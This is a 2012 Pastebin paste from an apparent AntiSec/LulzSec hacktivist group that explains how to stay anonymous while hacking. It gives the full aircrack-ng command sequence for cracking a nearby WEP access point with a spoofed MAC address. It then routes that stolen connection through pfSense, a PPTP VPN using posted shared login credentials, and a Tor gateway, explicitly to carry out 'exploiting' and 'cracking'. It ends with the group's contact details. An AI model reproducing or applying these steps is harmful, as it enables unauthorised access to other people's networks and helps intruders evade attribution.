Advertisement
Guest User

So you want to stay anonymous on the internet

a guest
Jan 25th, 2012
2,445
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.98 KB | None | 0 0
  1. ////////////////////////////////////////////////////////////////////////////////
  2. _ _ __ .__
  3. __| || |__ _____ _____/ |_|__| ______ ____ ____ #anonymous
  4. \ __ / \__ \ / \ __\ |/ ___// __ \_/ ___\ #antisec
  5. | || | / __ \| | \ | | |\___ \\ ___/\ \___ #lulzsec
  6. /_ ~~ _\ (____ /___| /__| |__/____ >\___ >\___ > #anonops
  7. |_||_| \/ \/ \/ \/ \/ #AntiSec-Ops
  8.  
  9. ////////////////////////////////////////////////////////////////////////////////
  10.  
  11. Want to stay hidden online?
  12.  
  13. Take a laptop with virtualbox/vmware/whatever virtual host and a usb wifi that supports packet injection
  14.  
  15. Install 4 virtual slices
  16.  
  17. #1 Install an OS (preferably Backtrack 5 or any linux distro to use aircrack-ng)
  18. Directly attach usb wifi to this VM (wlan0)
  19. Create Private virtual LAN (vmnet0 which will be eth0 on VM)
  20. Scan for wep AP's in your area
  21.  
  22. Use these commands to crack WEP encryption
  23. airmon-ng stop (interface)
  24. ifconfig (interface) down
  25. macchanger --mac 00:11:22:33:44:55 (interface)
  26. airmon-ng start (interface)
  27. airodump-ng (interface)
  28. airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)
  29. aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)
  30. aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
  31. aircrack-ng -b (bssid) (file name-01.cap)
  32. Connect to SSID
  33.  
  34. Bridge wlan0 to eth0 (vmnet0)
  35.  
  36. #2 pfsense firewall VM with a network adapter on vmnet0 (em0) and vmet1 (em1)
  37. http://www.fleximus.org/mirror/pfsense/downloads/pfSense-memstick-2.0.1-RELEASE-amd64.img.gz
  38. Install pfsense.
  39. Assign WAN to em0 and it should automatically pick up a dhcp IP from your previous slice
  40. Assign LAN to em1 and turn dhcp server on
  41. Login to pfsense config page (http://192.168.1.1 admin/pfsense by default) and go to pptp vpn page
  42. Use any of the following VPN servers:
  43.  
  44. Australia Server: ip-au.vpnoneclick.com
  45. Canada Server: ip-ca.vpnoneclick.com
  46. Germany Server: ip-de.vpnoneclick.com
  47. United Kingdom Server: ip-uk.vpnoneclick.com
  48. USA Server: ip-us.vpnoneclick.com
  49. Swiss Server: ip-ch.vpnoneclick.com
  50. Italy Server: ip-it.vpnoneclick.com
  51. Random Server: ip-rnd.vpnoneclick.com
  52.  
  53. Login:
  54. Username: 3I4T1Y5R8P
  55. Password: 8Y6G4O4A
  56.  
  57. #3 Install VM to "tor-ify" all data with one network adapter on vmnet1 (eth0)
  58. Follow steps for setting up Tor Gateway.
  59. https://trac.torproject.org/projects/tor/wiki/doc/TorBOX
  60. Box will receive IP from pfsense dhcp pool
  61.  
  62. #4 Install BackTrack 5 also on vmnet1 (eth0)
  63. Set default Gateway to use tor box
  64. All traffic will route through tor box which is also routed through pfsense pptp vpn connection
  65. All exploiting/penetration testing, cracking, etc is done on this slice
  66.  
  67. Feel free to contact us!
  68. Torchat: zwx6apd5yillugmw
  69. E-mail: antisec@tormail.net
  70. Twitter: https://twitter.com/AntiSecOp
  71. Facebook: http://tinyurl.com/785ejjc
  72.  
  73. Only emails from tormail accounts will be answered. All will be read
  74.  
  75. Stay frosty
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement